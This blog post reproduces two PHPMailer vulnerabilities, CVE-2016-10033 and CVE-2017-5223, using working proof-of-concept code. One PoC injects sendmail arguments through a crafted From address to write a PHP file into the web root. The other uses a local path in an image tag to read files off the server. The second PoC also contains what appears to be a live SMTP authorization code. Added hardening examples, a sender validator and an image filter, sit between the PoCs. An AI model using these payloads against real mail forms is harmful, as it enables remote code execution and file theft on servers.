PHPMailer command execution and arbitrary file read vulnerabilities


      Today, while browsing the thinkphp website, I happened to download a copy of eduaskcms. Looking through its libs directory I found PHPMailer-5.2.13, which reminded me of the PHPMailer vulnerabilities I had read about earlier. Unfortunately this CMS only exposes a mail interface and the front-end page has to be written separately, so the bugs cannot be reproduced with the CMS itself. Instead I used this PHPMailer-5.2.13 copy to reproduce CVE-2016-10033 and CVE-2017-5223 locally, and recorded the process here.

    PHPMailer command execution vulnerability (CVE-2016-10033)

    Vulnerability ID: CVE-2016-10033

    Affected versions: PHPMailer < 5.2.18

    Severity: high

    Vulnerability PoC:

    <?php /*
    PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
    A simple PoC (working on Sendmail MTA)
    It will inject the following parameters to sendmail command:
    Arg no. 0 == [/usr/sbin/sendmail]
    Arg no. 1 == [-t]
    Arg no. 2 == [-i]
    Arg no. 3 == [-fattacker]
    Arg no. 4 == [-oQ/tmp/]
    Arg no. 5 == [-X/var/www/cache/phpcode.php]
    Arg no. 6 == [some"@email.com]
    which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
    The resulting file will contain the payload passed in the body of the msg:
    09607 <<< --b1_cb4566aa51be9f090d9419163e492306
    09607 <<< Content-Type: text/html; charset=us-ascii
    09607 <<<
    09607 <<< <?php phpinfo(); ?>
    09607 <<<
    09607 <<<
    09607 <<<
    09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
    See the full advisory URL for details.
    */

    // Attacker's input coming from untrusted source such as $_GET , $_POST etc.
    // For example from a Contact form
    $email_from = '"attacker" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
    $msg_body  = "<?php phpinfo(); ?>";

    // ------------------
    // mail() param injection via the vulnerability in PHPMailer
    require_once('class.phpmailer.php');

    $mail = new PHPMailer(); // defaults to using php "mail()"
    $mail->SetFrom($email_from, 'Client Name');
    $address = "customer_feedback@company-X.com";
    $mail->AddAddress($address, "Some User");
    $mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033";
    $mail->MsgHTML($msg_body);

    if(!$mail->Send()) {
      echo "Mailer Error: " . $mail->ErrorInfo;
    } else {
      echo "Message sent!\n";
    }
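The PoC works because the From value reaches the sendmail command line through the fifth argument of mail(); versions from 5.2.18 on shell-escape that value, but a contact form should never hand a raw visitor string to SetFrom() in the first place. The following is an added example (not code from the post or from the PHPMailer project) of a sender check a form handler can run before the mailer is involved. It assumes the unnamespaced 5.2-era PHPMailer class; the function names isPlainMailbox and setSafeSender are hypothetical.

```php
<?php
// Added example: reject sender addresses that could become extra sendmail
// arguments, and keep the visitor's address out of the From header entirely.
// Function names are hypothetical; the PHPMailer class is assumed to be
// the unnamespaced 5.2-series class used elsewhere in this post.

declare(strict_types=1);

/**
 * Returns true only for a plain mailbox address that contains none of the
 * characters an option injection needs (whitespace, quotes, backslashes).
 */
function isPlainMailbox(string $address): bool
{
    // filter_var performs a strict syntax check; quoted local parts such as
    // "attacker"@example.com are syntactically valid but never wanted here.
    if (filter_var($address, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    // Anything that could split into a separate command-line argument.
    if (preg_match('/[\s"\'\\\\]/', $address) === 1) {
        return false;
    }
    // A leading '-' could be parsed as an option by the MTA.
    return $address[0] !== '-';
}

/**
 * Wraps SetFrom(): the From header is always a fixed, trusted site address;
 * the visitor's address only ever lands in Reply-To, and only if it is clean.
 * Returns false when the visitor address was rejected (caller should log it).
 */
function setSafeSender(PHPMailer $mail, string $visitorAddress, string $siteAddress): bool
{
    $mail->setFrom($siteAddress, 'Website contact form');  // constant, trusted value
    if (!isPlainMailbox($visitorAddress)) {
        return false;  // mail still goes out, just without a Reply-To
    }
    $mail->addReplyTo($visitorAddress);
    return true;
}

// Constructed inputs: the PoC sender string from the post and an ordinary address.
$samples = [
    '"attacker" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com' => false,
    'user@example.com'                                                  => true,
];
foreach ($samples as $input => $expected) {
    $ok = isPlainMailbox($input);
    printf("%-70s => %s\n", $input, $ok ? 'accepted' : 'rejected');
    assert($ok === $expected);
}
```

The design point is that validation is a second line of defence only: the From header is built from a constant the application controls, so even a validator bypass cannot put attacker-controlled text in front of sendmail. Upgrading past 5.2.18 remains necessary for any code path that still calls SetFrom() with user data.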

    PHPMailer arbitrary file read vulnerability analysis (CVE-2017-5223)

    Vulnerability ID: CVE-2017-5223

    Affected versions: PHPMailer <= 5.2.21

    Severity: high

    Vulnerability PoC: a few lines of the original author's PoC were changed so that it works with a QQ mailbox

    <?php
    #Author:Yxlink

    require_once('PHPMailerAutoload.php');
    $mail = new PHPMailer();
    $mail->isSMTP();
    $mail->Host = 'smtp.qq.com';
    $mail->Port = 465;
    $mail->SMTPAuth = true;
    $mail->Username = 'xxxx@qq.com';  // QQ mailbox
    $mail->Password = 'zsuhxbmsaioxbcgb'; // 16-character authorization code issued when enabling the mail client; not the QQ account password
    $mail->SMTPSecure = 'ssl';

    $mail->CharSet  = "UTF-8";
    $mail->Encoding = "base64";

    $mail->Subject = "hello";
    $mail->From = "xxxx@qq.com";
    $mail->FromName = "test";

    $address = "xxxx@qq.com";
    $mail->AddAddress($address, "test");

    $mail->AddAttachment('test.txt','test.txt');
    $mail->IsHTML(true);
    // Local path in the img src; the backslash is doubled because "\1" would be an octal escape in a double-quoted string
    $msg="<img src='D:\\1.txt'>test";
    $mail->msgHTML($msg);

    if(!$mail->Send()) {
      echo "Mailer Error: " . $mail->ErrorInfo;
    } else {
      echo "Message sent!";
    }
    ?>
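msgHTML() turns every <img src="..."> it finds into an inline attachment, which is why a local path in the src attribute becomes a file read on the mail server. Upgrading past 5.2.21 is the real fix; independently of that, untrusted HTML should never reach msgHTML() with unfiltered image sources. The following is an added example (not code from the post or from the PHPMailer project) of a pre-filter that drops every image whose src is not an absolute http(s) URL, with the cleaned HTML then assigned to Body so that no embedding step runs at all. The function name stripNonHttpImages is hypothetical.

```php
<?php
// Added example: remove <img> tags whose src is anything other than an
// absolute http(s) URL before the HTML is handed to the mailer. Local paths,
// file:// and data: URLs and relative references are all dropped.
// The function name is hypothetical.

declare(strict_types=1);

function stripNonHttpImages(string $html): string
{
    return preg_replace_callback(
        '/<img\b[^>]*>/i',
        static function (array $m): string {
            // Pull the src attribute (quoted or bare); no src means no image worth keeping.
            if (preg_match('/\bsrc\s*=\s*(["\']?)([^"\'\s>]+)\1/i', $m[0], $src) !== 1) {
                return '';
            }
            $url = $src[2];
            // Keep the tag only for an absolute http(s) URL with a host part.
            return preg_match('#^https?://[^/\s]+(?:/|$)#i', $url) === 1 ? $m[0] : '';
        },
        $html
    ) ?? '';
}

// Constructed inputs: the PoC payload from the post, two other local-read
// shapes, and a harmless remote image that must survive untouched.
$cases = [
    "<img src='D:\\1.txt'>test"                  => 'test',
    '<img src="file:///etc/passwd">x'            => 'x',
    '<img src="../../secret.txt">y'              => 'y',
    '<img src="https://example.com/logo.png">ok' => '<img src="https://example.com/logo.png">ok',
];
foreach ($cases as $input => $expected) {
    $out = stripNonHttpImages($input);
    assert($out === $expected);
    echo $out, "\n";
}

// Usage with the mailer: assign the cleaned HTML to Body instead of calling
// msgHTML(), so no image is ever converted into a local file attachment.
// $mail->isHTML(true);
// $mail->Body    = stripNonHttpImages($untrustedHtml);
// $mail->AltBody = strip_tags($mail->Body);
```

Assigning to Body rather than calling msgHTML() is deliberate: the filter removes the obvious local paths, but skipping the embedding step means an unexpected src form the regex did not anticipate still cannot trigger a file read.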
    

     

    Finally

    You are welcome to follow my personal WeChat official account: Bypass--, one original technical article every week.

     

    References:

    PHPMailer arbitrary file read vulnerability analysis (CVE-2017-5223) http://www.freebuf.com/vuls/124820.html

    PHPMailer command execution vulnerability (CVE-2016-10033) analysis http://blog.csdn.net/wyvbboy/article/details/53969278

    Original URL: https://www.cnblogs.com/xiaozi/p/8439864.html